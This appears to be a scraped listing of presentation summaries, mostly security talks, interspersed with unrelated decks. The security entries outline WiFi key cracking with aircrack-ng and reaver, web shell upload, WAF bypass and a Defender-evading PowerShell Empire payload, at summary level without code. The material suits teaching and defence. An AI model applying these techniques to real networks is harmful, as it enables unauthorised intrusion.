This paper introduces practical techniques used by hackers to break wireless security.
We recommend that the reader have basic knowledge of wireless operation.
JavaFest. Nanne Baars. Web application security for developers, by FestGroup
Security is an important topic for developers; however, security is often an afterthought in a project. This presentation will focus on practices which developers need to be aware of, and make security fun again. This is an in-depth talk about 10 topics, not an overview of security best practices.
Transforming Security: Containers, Virtualization and Softwarization, by Priyanka Aash
This session will explore how we can leverage containers, network/endpoint virtualization technologies and virtualized security instrumentation, concurrently, to transformationally improve security visibility, security analytics, system resilience and actionable context, greatly increasing our ability to attest that systems will be secure and compliant in any state into which they may be driven.
(Source: RSA USA 2016-San Francisco)
This document discusses the Shellshock vulnerability in the Bash shell. It provides background on Bash and describes how the vulnerability allows remote code execution. It then summarizes the timeline of vulnerability discovery and patches. Potential attack vectors like CGI scripts, DHCP, SSH, and SMTP are explained. Examples of known attacks from botnets, worms, and against Yahoo servers are also mentioned.
This document provides an overview of Python cryptography and security topics including cryptography concepts like hashing, symmetric and asymmetric encryption, digital signatures, and Python libraries for working with cryptography like PyCrypto and Cryptography. It also discusses Django security best practices like using HTTPS, securing cookies and passwords, and access control.
This document provides an introduction to Snort rule syntax and content matching. It describes the basic components of a Snort rule including the rule header, action, protocols, addresses, ports, and rule options. It then covers various content matching techniques like content, pcre, and content modifiers like nocase, offset, depth, distance, and within. It also discusses negated content matching, content buffers, and fast_pattern. Finally, it provides examples of how content matching can be used for detection strategies like traffic triage and isolating vulnerable application traffic.
Carlos García - Pentesting Active Directory Forests [rooted2019], by RootedCON
The document discusses penetration testing of Active Directory forests and trusts. It begins with an introduction to forests, domains, and trust types. It then covers authentication protocols like NTLM and Kerberos across trusts. Next, it discusses techniques for enumerating trusts and mapping the trust relationships. The document outlines common attacks when domain admin privileges are available, such as using Golden Tickets and SID history exploitation. For situations without domain admin, it recommends reconnaissance of trusts and objects to map a path to privileged accounts.
PowerShell is liked by admins and programmers, and most of all by hackers. Being the native shell of Windows systems, it does not stand out, while at the same time offering enormous offensive capabilities. During the talk Paweł will present both effective one-liners and multi-line scripts that can wreak havoc in an unprepared organization. There will be interesting C2 channels, malware written entirely in PowerShell, finding and exploiting poorly configured MSSQL servers, etc. 100% substance.
This document discusses WPA exploitation in wireless networks. It begins by explaining basic wireless networking concepts like WiFi, MAC addresses, and SSIDs. It then describes how wireless networks are vulnerable due to weak encryption methods like WEP. The document outlines stronger encryption methods like WPA and WPA2, but notes they can still be cracked with tools if a weak password is used. It proceeds to explain how tools like Aircrack-ng, Reaver, and John the Ripper can be used to crack wireless network encryption keys through techniques like packet sniffing, dictionary attacks, and exploiting WPS pins. In the end, it emphasizes the importance of using long, complex passwords to keep wireless networks secure.
Linux Server Hardening - Step by Step, by Sunil Paudel
Linux Server Hardening
This document gives a step-by-step walkthrough of hardening a server. We used the Metasploitable server, the vulnerable Ubuntu server designed to be hacked, and hardened it. We stopped all unnecessary services and closed unneeded ports. We assumed the server to be a web server only; hence, only ports 80 and 443 are left open. Then the firewall rules were set, followed by Apache web server hardening, encryption of folders and files, disabling unwanted users, and enforcing password policies.
Holland safenet livehack hid usb pineapple_cain_oph_with_video, by robbuddingh
This document discusses hacking tools and techniques that could enable man-in-the-middle attacks on wireless networks. It describes how a wireless penetration testing device could intercept probe requests from a device looking to connect to a wireless network, and respond posing as the legitimate network to establish a connection. Once connected, the device could monitor and manipulate web traffic using tools like Cain & Abel, ARP poisoning, and DNS spoofing. Rainbow tables are also mentioned as a tool for cracking Windows passwords using hashed values within a few minutes. Throughout, the document emphasizes these techniques should only be used for legitimate security testing and not illegal hacking.
From Kernel Space to User Heaven #NDH2k13, by Jaime Sánchez
FROM KERNEL SPACE TO USER HEAVEN at NUIT DU HACK 2013 by JAIME SANCHEZ
More information at:
Twitter: @segofensiva
Website: http://www.seguridadofensiva.com
What if you could enqueue all your incoming and outgoing network connections from kernel space to user space? You could then develop offensive/defensive applications to modify headers and payloads in real time, to detect unauthorized traffic like DNS tunneling connections, or to fool some well-known network tools. This will be shown on Linux-powered devices. Some remote OS fingerprinting techniques, both active and passive, as implemented in tools like nmap, p0f, or vendor appliances, will also be explained, along with how to defeat them. This technique doesn't need virtual machines or kernel patches, and is highly portable to other platforms.
The document discusses the Web Crypto API which allows cryptographic operations like hashing, signatures, and encryption/decryption to be performed in web applications. It covers the SubtleCrypto interface which provides cryptographic algorithms and methods. Some key methods include importKey, deriveKey, encrypt, and decrypt. It also discusses concepts like symmetric keys, AES-GCM encryption, PBKDF2 key derivation, and storing encrypted data with salts and initialization vectors. An example is provided of encrypting and decrypting data with a password using these Web Crypto API methods.
IPv6 Security with Mikrotik RouterOS, by Wardner Maia
This document provides an overview and introduction to IPv6 security presented by Wardner Maia. Some key points:
- Wardner Maia is a Brazilian engineer and IPv6 security expert who will discuss new threats introduced by IPv6 features and protocols.
- IPv6 adoption is important due to the depletion of IPv4 addresses but it introduces new security challenges due to its new features and protocols.
- The presentation will cover reconnaissance techniques enabled by IPv6's large address space, vulnerabilities in address autoconfiguration and neighbor discovery, and countermeasures using Mikrotik RouterOS firewall rules.
- Live demonstrations will show how threats like man-in-the-middle attacks can be carried out using IPv6 neighbor
Derevolutionizing OS Fingerprinting: The cat and mouse game, by Jaime Sánchez
With the explosive growth and distributed nature of computer networks, it has become progressively more difficult to manage, secure, and identify Internet devices. An outsider has the capability to discover general information, such as which operating system a host is running, by searching for default stack parameters, ambiguities in IETF RFCs or non-compliant TCP/IP implementations in responses to malformed requests. By pinpointing the exact OS of a host, an attacker can launch an educated and precise attack against a target machine.
There are a lot of reasons to hide your OS from the entire world:
Revealing your OS makes it easier to find and successfully run an exploit against any of your devices.
Having an unpatched or antique OS version is not very good for your company's prestige. Imagine that your company is a bank and some users notice that you are running an unpatched box. They won't trust you any longer! In addition, this kind of 'bad' news always reaches public opinion.
Knowing your OS can also become more dangerous, because people can guess which applications you are running on that OS (data inference). For example, if your system is MS Windows and you are running a database, it's highly likely that you are running MS-SQL.
It could be convenient for other software companies to offer you a new OS environment (because they know which one you are running).
And finally, privacy: nobody needs to know which systems you've got running.
This talk aims to present well-known methods that perform classification using application-layer traffic (TCP/IP/UDP headers, ICMP packets, or some combination thereof), old-style approaches to defeating remote OS fingerprinting (like tweaking the Windows registry or applying patches to the Linux kernel), and why these no longer work today and could affect TCP/IP stack performance. We'll also present a new approach to detecting and defeating both active and passive OS fingerprinting with OSfooler-NG, a completely rewritten tool, highly portable, completely undetectable by attackers and capable of detecting and defeating famous tools like nmap, p0f, Xprobe, pfsense and many commercial engines.
Sorry guys, OS fingerprinting is over...
This document introduces Tortilla, software designed to allow security researchers to safely and anonymously interact with hostile servers and actors online. It discusses how traditional malware research was more passive, but now requires actively monitoring adversary infrastructure. The Tor network and Tor Browser Bundle are described as existing solutions for anonymity, but they have limitations like only supporting the Firefox browser and not plugins. Tortilla aims to address these issues by providing a more robust anonymity solution.
End-to-End Analysis of a Domain Generating Algorithm Malware Family Whitepaper, by CrowdStrike
The document provides an overview of domain generating algorithms (DGAs) used by malware to dynamically determine remote server addresses and evade detection. It details the analysis performed on a malware family submitted to CrowdStrike, including deobfuscating the binary, analyzing its DGA and network functionality, sinkholing domains, and investigating the malware author. The family has been active for at least six years and infects thousands of devices.
Presentation for the Postgraduate Program in Information Security:
- Plain-text password sniffer;
- Brute-force attack on SSH;
- Protection: firewall, IPS and/or TCP Wrappers;
- Basic security in sshd_config;
- RSA/DSA keys for remote access;
- SSH looking up keys in LDAP;
- Why prevent access: fork bomb
This document discusses computer network security. It begins by defining security and explaining why security is needed, then discusses topics like firewalls and common threats such as denial of service attacks and TCP hijacking. The most vulnerable targets are listed as financial institutions, internet service providers, and government agencies. The document then explains specific security mechanisms and attacks in more detail, such as firewalls and intrusion detection systems, different types of denial of service attacks, and how TCP hijacking works. It stresses the importance of security updates and patching known vulnerabilities.
Security PWNing 2018 - Penthertz: The use of radio attacks during red team tests, by Sebastien Dudek
Presentation made at SecurityPWNing 2018 explaining how to intrude into a company using radio attacks, with real-case scenarios we encountered during our tests.
Park Quantification Of Aesthetic Viewing Using Eye Tracking Technology The In..., by Kalle
The purpose of this study is to explore how the viewers’ previous training is related to their aesthetic viewing in various interactions with the form and the context, in relation to apparel design. Berlyne’s two types of exploratory behavior, diversive and specific, provided a theoretical framework to this study. Twenty female subjects (mean age=21, SD=1.089) participated. Twenty model images, posed by a male and a female model, were shown on an eye-tracker screen for 10 seconds each. The findings of this study verified Berlyne’s concepts of visual exploration. One of the different findings from Berlyne’s theory was that the untrained viewers’ visual attention tended to be more significantly focused on peripheral areas of visual interest, compared to the trained viewers, while there was no significant difference on the central, foremost areas of visual interest between the two groups. The overall aesthetic viewing patterns were also identified.
This document is the graphic design and advertising portfolio of Muhammad Yustan, containing a summary of several of his works that were entered in various competitions and university assignments, including the Pinasthika and Caraka competitions and assignments for the Advertising Copywriting (Penulisan Naskah Iklan) course.
This document provides instructions for an activity where students will classify animals into groups based on observable features. The activity involves students sorting plastic animals from two bags into groups based on characteristics like appearance, habitat, and behavior. The document defines key terms like classification, species, vertebrates and invertebrates. It explains that animals can be classified in multiple ways, such as by color, size, or as mammals. Students are asked to observe the animals, list features, determine the number of different types, and sort them into two initial groups. They then add animals from a second bag to the appropriate groups, explaining their reasoning. Finally, students are asked to consider if living things can be grouped in more ways than one and if
The Livescribe pen allows users to take notes using the pen on special dot paper notebooks while simultaneously recording any discussions or lectures. The pen acts as a computer, storing up to 2GB or 4GB of data on the pen itself. Users can playback any recordings directly from the pen or by uploading notes to their computer. The pen has applications for both education and other uses, but requires the specialized dot paper and can be cost prohibitive for student use. However, it provides benefits like enhancing learning through playback of lectures and collaboration on projects.
Takemura Estimating 3 D Point Of Regard And Visualizing Gaze Trajectories Und..., by Kalle
The portability of an eye tracking system encourages us to develop a technique for estimating 3D point-of-regard. Unlike conventional methods, which estimate the position in the 2D image coordinates of the mounted camera, such a technique can represent richer gaze information of the human moving in the larger area. In this paper, we propose a method for estimating the 3D point-of-regard and a visualization technique of gaze trajectories under natural head movements for the head-mounted device. We employ visual SLAM technique to estimate head configuration and extract environmental information. Even in cases where the head moves dynamically, the proposed method could obtain 3D point-of-regard. Additionally, gaze trajectories are appropriately overlaid on the scene camera image.
The document summarizes a hacking attack on a company called mBank. The attack involved scanning the website for vulnerabilities, finding credentials in PHP files that allowed accessing the MySQL database, and uploading a PHP shell to gain remote access. Key steps included SQL injection to find files on the server, extracting credentials from the configuration file to access the database as the root user, and using the database to upload a web shell.
Katherine Brittain selected final images for an ancillary task involving a band. She chose individual pictures of the singer, guitarist, bassist, and drummer that showed each band member well. She also selected a group shot of the full band, though some editing would be needed to adjust sizes and remove a t-shirt graphic. Additionally, Katherine chose a solo shot of the singer that could be edited to resemble a Rhianna album cover.
- Amy and a classmate worked on creating a music video over several months from September 2009 to April 2010. They researched music videos, analyzed songs and videos, created storyboards and designs, filmed and edited footage, and created supplemental materials like a marketing plan. They worked as a team to complete the project, with each contributing ideas, though the classmate felt Amy could have been more involved in editing and supplemental tasks. In the end, they managed to finish the project on time despite some inconsistent work periods.
Ahmad Siddiq Wi-Fi Ninjutsu Exploitation, by barcamp.my
The document provides instructions on techniques for cracking wireless network security, including both WEP and WPA encryption. It discusses using tools like aircrack-ng to capture packets, perform injection attacks like deauthentication, ARP replay, and fragmentation. Both simple techniques without injection, like capturing packets over time, and more advanced techniques using packet injection methods are covered. The goal is to obtain enough encrypted packets or keystream fragments to crack the network encryption key.
Wireless Pentesting: It's more than cracking WEP, by Joe McCray
The document discusses the methodology for wireless penetration testing. It covers reconnaissance of wireless networks to identify available networks and access points. Next, it discusses attacking wireless networks by breaking encryption like WEP, and manipulating wireless authentication. It also covers bypassing wireless isolation controls and deploying rogue access points. The goal of the testing is to determine if an attacker can access the production network over the wireless medium.
This document discusses cracking WEP secured wireless networks. It begins by explaining that WEP is an outdated protocol with known weaknesses that can be cracked within minutes using readily available software. It then provides details on WEP authentication methods and how the encryption works. The main weakness discussed is that the 24-bit initialization vector is not long enough to ensure uniqueness, allowing the key to be cracked. The document concludes by demonstrating how to enable monitor mode, attack a target network to capture packets, and use those packets to crack the WEP key in minutes using aircrack-ng software on BackTrack Linux. It advises moving to more secure WPA or WPA2 encryption.
This session covered cyber security and ethical hacking topics such as network hacking, Kali Linux, IPV4 vs IPV6, MAC addresses, wireless hacking techniques like deauthentication attacks, cracking WEP and WPA encryption, and post-connection attacks including ARP spoofing and MITM attacks. The presenter emphasized the importance of securing networks by using strong passwords, disabling WPS, and enabling HTTPS to prevent hacking attempts.
The document discusses techniques for conducting a "grey-box" attack on Windows and Linux systems. It covers scanning and enumeration of open ports and services using Nmap to identify vulnerabilities. It then discusses methods for gaining initial access, including exploiting the null session vulnerability in Windows 2000 to enumerate user accounts. It also discusses privilege escalation techniques to gain full control of compromised systems. The document provides examples using Nmap and Metasploit to automate vulnerability scanning and exploitation.
The document provides an overview of cracking WiFi networks using aircrack-ng and related tools. It discusses network basics like MAC addresses and wireless modes like managed and monitor. It then covers specific attacks like deauth attacks to disconnect clients, capturing handshakes using airodump-ng and packet injection with aireplay-ng. Finally it discusses cracking encrypted networks starting with older WEP encryption through WPA and WPA2 using captured handshakes and wordlist attacks with aircrack-ng. The document serves as a guide to common WiFi cracking techniques.
This document discusses wireless hacking and security. It begins by explaining why wireless networks are popular due to convenience and cost but also introduces security issues. It then covers wireless standards, encryption types like WEP, WPA and WPA/PSK. The document details how to hack wireless networks by locating them, capturing packets to crack encryption keys using tools like Kismet, Aircrack and commands like ifconfig. Finally, it provides tips to prevent wireless hacking including not broadcasting SSIDs, changing default logins and using stronger encryption like WPA.
This ppt covers what wireless hacking is, the types of Wi-Fi security (e.g. WEP, WPA, WPA/PSK) and the terms related to them. It also covers how wireless networks are cracked and the tools and commands required for it. This is very useful. Catch it..... :)
International Conference On Electrical and Electronics Engineering, by anchalsinghdm
ICGCET 2019 | 5th International Conference on Green Computing and Engineering Technologies. The conference will be held on 7th September - 9th September 2019 in Morocco. International Conference On Engineering Technology
The conference aims to promote the work of researchers, scientists, engineers and students from across the world on advancement in electronic and computer systems.
A tutorial showing you how to crack wifi passwords using kali linux!, by edwardo
1. The document provides instructions for cracking WiFi passwords through the command line interface (CMD) on a Kali Linux system. It outlines 5 steps: starting the wireless card in monitor mode, capturing wireless traffic with airodump-ng, identifying the target access point, checking if it has WPS enabled with wash, and cracking the password with reaver if WPS is enabled.
2. It explains some key information displayed during the capturing process like the BSSID, signal strength, encryption, and ESSID.
3. The full process took around 5 hours to crack a 19 character WPA2 password on a virtual machine, but the time can vary depending on hardware. Turning off WPS is
Auditing a Wireless Network and Planning for a Secure WLAN Implementation, by CARMEN ALCIVAR
The document is a lab assignment summarizing an audit of a wireless network. The student found that the network was vulnerable due to a lack of encryption. Using tools like aircrack-ng, the student was able to capture login credentials and other data in clear text. The student then used a dictionary attack to crack the WPA key and gain unauthorized access to the network. In their recommendations, the student emphasizes using strong encryption methods like WPA2 and multifactor authentication to secure the wireless network and prevent unauthorized access.
How to Hack WPA/WPA2 Wi Fi with Kali Linux. Kali Linux can be used for many things, but it probably is best known for its ability to penetration test, or “hack,” WPA and WPA2 networks.
Warning..!! WIFI hacking is illegal. "This ppt is only for educational purposes. I am not responsible for any consequences."
Pentesting Wireless Networks and Wireless Network Security, by Ayoma Wijethunga
Regardless of residential or corporate environments, wireless networking has been trending, bringing WLAN equipment revenue up to $5.2 billion in 2015. Unlike wired networks, wireless networks go beyond the walls, and could transmit your corporate or personal data in a way anyone else can eavesdrop on. With the quick adoption of wireless networking, control of smart devices, including smart home devices and smart cars, might end up in the hands of a blackhat hacker. Looking from a different angle, every time you connect to an untrusted wireless network, a malicious attacker might be listening to your communication.
This session will technically discuss security risks associated with wireless networks, with near real-life demonstrations. Different network security mechanisms and their weaknesses will be discussed. Towards the end of the session, we will be discussing best practices that should be followed to secure wireless networks and your data over wireless networks.
Demonstrations will include the following:
* Wireless network discovery and probing
* Wireless network attacks (WEP/WPA/WPS)
* Using OpenWrt open source firmware in wireless security
* Rogue wireless access points (MitM/Traffic Logging)
The document summarizes a presentation on wireless security. It discusses wireless standards like 802.11b, 802.11a, and 802.11g and security standards like WEP, WPA, and WPA2. It describes vulnerabilities in WEP like weak IVs and keys. It also explains attacks like identity theft through MAC spoofing and defenses like strong encryption, authentication, and regular key changes.
The document summarizes a presentation on wireless security. It discusses wireless standards like 802.11b, 802.11a, and 802.11g and security standards like WEP, WPA, and WPA2. It describes vulnerabilities in WEP like weak IVs and keys. It also explains attacks like identity theft through MAC spoofing and defenses like strong encryption, authentication, and monitoring.
Welcome to the world of 'network security', an unavoidable term in cyber security. This white paper on network security covers the most significant and predominantly used network security concepts, which are highly important for keeping your network environment secure.
This document provides an overview of AirCrack-ng, a suite of tools for assessing WiFi network security. It discusses the tools in the AirCrack-ng suite like aircrack-ng for cracking WEP and WPA/WPA2 keys. It also describes commands used like airmon-ng to put interfaces in monitor mode and airodump-ng to capture handshakes. The document explains how to use captured handshakes and wordlists with aircrack-ng to crack network passwords if the password is in the wordlist. It also discusses how to perform WiFi deauthentication attacks to capture new handshakes by forcing clients to reconnect.
Shameful secrets of proprietary network protocols, by Slawomir Jasek
There is a big bunch of tools offering HTTP/SSL traffic interception. However, when it comes to penetration tests of specialized embedded software or thick clients, we often encounter proprietary protocols with no documentation at all: binary TCP connections unlike anything else, impossible to handle with a well-known local proxy. Without disassembling the protocol, pentesting the server backend is very limited. Yet, based on our experience, it very often hides a shameful secret: completely unsecured mechanisms breaking all secure coding practices.
To demonstrate, we will show a few case studies, the most interesting examples from real-life industry software, which in our opinion are the quintessence of "security by obscurity". We will challenge the security of proprietary protocols in pull printing solutions, FOREX trading software, remote desktops and home automation technologies.
This document outlines various mobile application security vulnerabilities and methods for assessing mobile application security. It discusses insecure network protocols, cryptographic weaknesses, privacy issues related to data storage, authentication and session management vulnerabilities, environmental interaction risks, and challenges of securing mobile applications against reverse engineering. It provides examples of specific vulnerabilities discovered in mobile applications and frameworks. The document promotes applying a defense-in-depth approach to mobile application security based on the OWASP Mobile Application Security Verification Standard (MASVS).
This document discusses a project called CARzyPire that involves using a Raspberry Pi Zero W, Crazyradio PA, and PowerShell Empire installed on a remote-controlled car to conduct penetration testing. It provides instructions on setting up the necessary hardware and software, including customizing a PowerShell Empire payload to bypass Windows Defender and creating a Duckyscript to deliver the payload. The payload would then be delivered to targets using the remote-controlled car and Crazyradio PA's ability to hijack wireless keyboards and mice. Control of any successful implants would be maintained using PowerShell Empire's web interface.
The document discusses various techniques for exploiting web applications, beginning with older techniques like exploiting default admin paths, uploading web shells, and SQL injection, and progressing to more modern attacks against content management systems and frameworks. It provides examples of each technique and emphasizes exploiting vulnerabilities like file inclusion and stored procedures to achieve remote code execution. The instructor profile indicates extensive security experience and certifications. The organization Secure D Center is introduced as focusing on cybersecurity services across Southeast Asia.
The session will provide the risk of insecure mobile application development in various types with demonstration; Client-side, Communication channel and Server side. The presentation includes case study of insecure development practice which lead attacker to abuse the vulnerable application (e.g. Coin/Gem cheating on gaming app, Bypassing security control on client-side and server-side).
The document discusses the Mobile Application Security Verification Standard (MASVS) project from OWASP. It provides an overview of the MASVS levels and describes the eight verification requirements areas: 1) Architecture, Design and Threat Modeling; 2) Data Storage and Privacy; 3) Cryptography; 4) Authentication and Session Management; 5) Network Communication; 6) Platform Interaction; 7) Code Quality and Build Setting; and 8) Resilience. Each verification requirement area includes example requirements and references related information. The goal of MASVS is to provide a standard way to verify the security of mobile apps and help developers build more secure apps.
TL;DR
Motivation
Dynamic binary instrumentation
FRIDA
DBI without rooting / jailbreaking
Unleash the power of Frida
Case study for runtime exploitation
Countermeasure
References
The document discusses the WannaCry ransomware attack of May 2017. It begins with an overview of ransomware, including what it is, how it spreads, and examples like CryptoLocker and WannaCry. It then details the global WannaCry attack, how it exploited the EternalBlue vulnerability to encrypt files and demand ransom payments in Bitcoin. Key lessons are around patching systems promptly, having backups, and following best practices to prevent ransomware infection and limit damage. The timeline shows the lead up to WannaCry, from the Shadow Brokers leak of NSA tools to Microsoft releasing an emergency patch once the attacks began.
The document summarizes the key findings of a report analyzing 126 popular mobile health and finance apps. It found that while consumers and executives believe their apps are secure, 90% of apps tested had at least two of the top 10 mobile security risks as defined by OWASP. Specifically, 98% lacked binary protections and 83% had insufficient transport layer protection. The document then outlines the 10 most critical mobile security risks according to OWASP, including improper platform usage, insecure data storage, insecure communication, and extraneous functionality.
Prathan Phongthiproek, a manager at KPMG Thailand, gave a presentation on mobile application attacks at the Cyber Defense Initiative Conference (CDIC) 2016. The presentation covered various attack vectors for both Android and iOS applications, including user input attacks, abusing application components, insecure data storage, manipulating binary and storage files, bypassing root/jailbreak detection, and intercepting network traffic. For each attack vector, the presentation estimated the potential damage level and threat level. The goal was to help organizations better understand mobile application security risks and implement proper countermeasures.
The document discusses the benefits of exercise for mental health. It states that regular physical activity can help reduce anxiety and depression and improve mood and cognitive function. Exercise causes chemical changes in the brain that may help protect against developing mental illness and improve symptoms for those who already suffer from conditions like anxiety and depression.
The document discusses vulnerabilities in point-of-sale (POS) systems, including data in memory, data at rest, data in transit, and application code/configuration vulnerabilities. It describes different POS deployment models and their pros and cons in terms of security. A case study examines physical and network security issues found during a pentest of a retail store's POS system, including sensitive data exposure over the network. Recommended protections include minimizing data exposure, encryption of data in memory, in transit, and at rest, and avoiding storage of sensitive data.
This document discusses penetration testing methodologies and best practices. It emphasizes that penetration testing involves more than just tools - it requires following a proper methodology, managing risks, and providing targeted recommendations to clients. It provides examples of penetration testing case studies and highlights the importance of going beyond automated scans to conduct manual testing of authentication, authorization, business logic, and client-side vulnerabilities. The document stresses that penetration testers should think creatively and "outside the box" to identify security issues rather than just trusting scan results.
The document discusses security issues related to mobile applications. It describes how mobile apps now offer many more services than basic phone calls and texts. This expanded functionality introduces new attack surfaces, including the client software on the device, the communication channel between the app and server, and server-side infrastructure. Some common vulnerabilities discussed are insecure data storage on the device, weaknesses in data encryption, SQL injection, and insecure transmission of sensitive data like credentials over the network. The document also provides examples of techniques for analyzing app security like reverse engineering the app code and using a proxy like Burp Suite to intercept network traffic.
The document discusses common web application vulnerabilities like SQL injection, cross-site scripting (XSS), file inclusion, and remote code execution. It provides examples of each vulnerability type and how they can be exploited. Methods for detecting and preventing these vulnerabilities are also covered, including input validation, output encoding, limiting dangerous functions, and using tools like RIPS scanner to detect vulnerabilities.
The document summarizes a presentation on advanced mobile penetration testing. It discusses attacking three surfaces: the client software on mobile devices, the communications channel, and server-side infrastructure. It provides examples of exploiting iOS and Android applications, such as decompiling code, intercepting traffic with proxies, and accessing embedded data and databases. The presentation emphasizes fast, hands-on techniques and tools for assessing mobile application security.
This document introduces Web Application Firewall (WAF) and discusses techniques for bypassing WAF protections, including SQL injection, cross-site scripting, file inclusion, HTTP parameter contamination, and HTTP pollution attacks. It provides examples of bypassing specific WAF vendors and open source WAFs like ModSecurity and PHPIDS. While WAFs can block some attacks, the document argues they cannot eliminate all vulnerabilities and proper secure coding is still needed. It concludes that WAFs may succeed or fail depending on configurations and imaginative attacks.
The document discusses security and privacy challenges in the digital age, focusing on client-side or "layer 8" hacking techniques that target human vulnerabilities. It describes how hackers gather information on targets from social media, documents, and email to craft spear phishing attacks. The document also outlines automated exploitation techniques using known vulnerabilities in browsers, plugins and applications, demonstrating how hackers can easily compromise systems without any user interaction. It emphasizes the importance of user awareness training, security policies, and sanitizing public documents and files to reduce the risks of these client-side attacks.
The document discusses security challenges posed by modern malware and web-based attacks. It provides examples of next-generation malware that bypass antivirus detection using techniques like embedding malicious code in Office documents or PDF files. It also discusses how web-based malware has evolved from defacements and DDoS tools to more advanced drive-by download attacks using exploit kits. The document aims to demonstrate malware analysis techniques and how to detect web server backdoors through tools and manual source code reviews. It concludes with a challenge to practice security skills safely.
This document provides an overview of mobile phone forensic analysis, focusing on analysis of the iPhone. It discusses jailbreaking iPhones to allow forensic acquisition and analysis of file systems. It also discusses analyzing iTunes backup files from iPhones, which can contain data like call history, SMS messages, photos and more. Tools are presented for extracting and analyzing data from both jailbroken iPhones and iTunes backup files. The document emphasizes the importance of forensic soundness when acquiring data from mobile devices.
Kief Morris rethinks the infrastructure code delivery lifecycle, advocating for a shift towards composable infrastructure systems. We should shift to designing around deployable components rather than code modules, use more useful levels of abstraction, and drive design and deployment from applications rather than bottom-up, monolithic architecture and delivery.
論文紹介:A Systematic Survey of Prompt Engineering on Vision-Language Foundation ...Toru Tamaki
Jindong Gu, Zhen Han, Shuo Chen, Ahmad Beirami, Bailan He, Gengyuan Zhang, Ruotong Liao, Yao Qin, Volker Tresp, Philip Torr "A Systematic Survey of Prompt Engineering on Vision-Language Foundation Models" arXiv2023
https://arxiv.org/abs/2307.12980
RPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptxSynapseIndia
Your comprehensive guide to RPA in healthcare for 2024. Explore the benefits, use cases, and emerging trends of robotic process automation. Understand the challenges and prepare for the future of healthcare automation
Blockchain technology is transforming industries and reshaping the way we conduct business, manage data, and secure transactions. Whether you're new to blockchain or looking to deepen your knowledge, our guidebook, "Blockchain for Dummies", is your ultimate resource.
How Social Media Hackers Help You to See Your Wife's Message.pdfHackersList
In the modern digital era, social media platforms have become integral to our daily lives. These platforms, including Facebook, Instagram, WhatsApp, and Snapchat, offer countless ways to connect, share, and communicate.
Support en anglais diffusé lors de l'événement 100% IA organisé dans les locaux parisiens d'Iguane Solutions, le mardi 2 juillet 2024 :
- Présentation de notre plateforme IA plug and play : ses fonctionnalités avancées, telles que son interface utilisateur intuitive, son copilot puissant et des outils de monitoring performants.
- REX client : Cyril Janssens, CTO d’ easybourse, partage son expérience d’utilisation de notre plateforme IA plug & play.
Best Programming Language for Civil EngineersAwais Yaseen
The integration of programming into civil engineering is transforming the industry. We can design complex infrastructure projects and analyse large datasets. Imagine revolutionizing the way we build our cities and infrastructure, all by the power of coding. Programming skills are no longer just a bonus—they’re a game changer in this era.
Technology is revolutionizing civil engineering by integrating advanced tools and techniques. Programming allows for the automation of repetitive tasks, enhancing the accuracy of designs, simulations, and analyses. With the advent of artificial intelligence and machine learning, engineers can now predict structural behaviors under various conditions, optimize material usage, and improve project planning.
Quantum Communications Q&A with Gemini LLM. These are based on Shannon's Noisy channel Theorem and offers how the classical theory applies to the quantum world.
BT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdfNeo4j
Presented at Gartner Data & Analytics, London Maty 2024. BT Group has used the Neo4j Graph Database to enable impressive digital transformation programs over the last 6 years. By re-imagining their operational support systems to adopt self-serve and data lead principles they have substantially reduced the number of applications and complexity of their operations. The result has been a substantial reduction in risk and costs while improving time to value, innovation, and process automation. Join this session to hear their story, the lessons they learned along the way and how their future innovation plans include the exploration of uses of EKG + Generative AI.
The Rise of Supernetwork Data Intensive ComputingLarry Smarr
Invited Remote Lecture to SC21
The International Conference for High Performance Computing, Networking, Storage, and Analysis
St. Louis, Missouri
November 18, 2021
The DealBook is our annual overview of the Ukrainian tech investment industry. This edition comprehensively covers the full year 2023 and the first deals of 2024.
Coordinate Systems in FME 101 - Webinar SlidesSafe Software
If you’ve ever had to analyze a map or GPS data, chances are you’ve encountered and even worked with coordinate systems. As historical data continually updates through GPS, understanding coordinate systems is increasingly crucial. However, not everyone knows why they exist or how to effectively use them for data-driven insights.
During this webinar, you’ll learn exactly what coordinate systems are and how you can use FME to maintain and transform your data’s coordinate systems in an easy-to-digest way, accurately representing the geographical space that it exists within. During this webinar, you will have the chance to:
- Enhance Your Understanding: Gain a clear overview of what coordinate systems are and their value
- Learn Practical Applications: Why we need datams and projections, plus units between coordinate systems
- Maximize with FME: Understand how FME handles coordinate systems, including a brief summary of the 3 main reprojectors
- Custom Coordinate Systems: Learn how to work with FME and coordinate systems beyond what is natively supported
- Look Ahead: Gain insights into where FME is headed with coordinate systems in the future
Don’t miss the opportunity to improve the value you receive from your coordinate system data, ultimately allowing you to streamline your data analysis and maximize your time. See you there!
Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...Chris Swan
Have you noticed the OpenSSF Scorecard badges on the official Dart and Flutter repos? It's Google's way of showing that they care about security. Practices such as pinning dependencies, branch protection, required reviews, continuous integration tests etc. are measured to provide a score and accompanying badge.
You can do the same for your projects, and this presentation will show you how, with an emphasis on the unique challenges that come up when working with Dart and Flutter.
The session will provide a walkthrough of the steps involved in securing a first repository, and then what it takes to repeat that process across an organization with multiple repos. It will also look at the ongoing maintenance involved once scorecards have been implemented, and how aspects of that maintenance can be better automated to minimize toil.
Are you interested in dipping your toes in the cloud native observability waters, but as an engineer you are not sure where to get started with tracing problems through your microservices and application landscapes on Kubernetes? Then this is the session for you, where we take you on your first steps in an active open-source project that offers a buffet of languages, challenges, and opportunities for getting started with telemetry data.
The project is called openTelemetry, but before diving into the specifics, we’ll start with de-mystifying key concepts and terms such as observability, telemetry, instrumentation, cardinality, percentile to lay a foundation. After understanding the nuts and bolts of observability and distributed traces, we’ll explore the openTelemetry community; its Special Interest Groups (SIGs), repositories, and how to become not only an end-user, but possibly a contributor.We will wrap up with an overview of the components in this project, such as the Collector, the OpenTelemetry protocol (OTLP), its APIs, and its SDKs.
Attendees will leave with an understanding of key observability concepts, become grounded in distributed tracing terminology, be aware of the components of openTelemetry, and know how to take their first steps to an open-source contribution!
Key Takeaways: Open source, vendor neutral instrumentation is an exciting new reality as the industry standardizes on openTelemetry for observability. OpenTelemetry is on a mission to enable effective observability by making high-quality, portable telemetry ubiquitous. The world of observability and monitoring today has a steep learning curve and in order to achieve ubiquity, the project would benefit from growing our contributor community.
Quality Patents: Patents That Stand the Test of TimeAurora Consulting
Is your patent a vanity piece of paper for your office wall? Or is it a reliable, defendable, assertable, property right? The difference is often quality.
